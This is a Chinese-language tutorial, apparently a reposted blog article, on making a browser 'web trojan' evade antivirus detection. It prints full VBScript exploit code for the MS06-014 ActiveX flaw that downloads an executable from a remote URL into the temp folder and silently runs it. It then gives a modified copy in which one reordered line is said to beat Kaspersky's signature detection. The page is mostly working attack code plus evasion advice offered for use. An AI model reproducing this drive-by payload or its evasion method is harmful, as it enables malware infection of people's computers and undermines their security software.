网马免杀方法一般两种办法,一种是加密(微软自己的encode或者自己写加解密函数效果更好),另一种也是找特征码(字符或顺序)。
有朋友说网马被喀吧杀,不知道所措,现我以ms06014为例,以传小技。原来的代码:
<html> <script language="VBScript"> on error resume next dl = "http://www.baidu.com/go.exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="g0ld.com" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 </script> <head> <title>Oh,my god!</title> </head><body> <center>You DO it!</center> </body></html>
免杀后:
<html> <html> <script language="VBScript"> on error resume next dl = "http://www.baidu.com/go.exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="g0ld.com" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) S.open fname1= F.BuildPath(tmp,fname1) S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 </script> <head> <title>Oh,my god!</title> </head><body> <center>You DO it!</center> </body></html>
大家注意观察,其实我就是将S.open语句移动到fname1= F.BuildPath(tmp,fname1)语句之前就实现了免杀,这正是挫败了喀吧的文件流特征码检测技术。当然,在移动语句的时候,有必要注意语句在代码里的功能,不然会出错的。
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
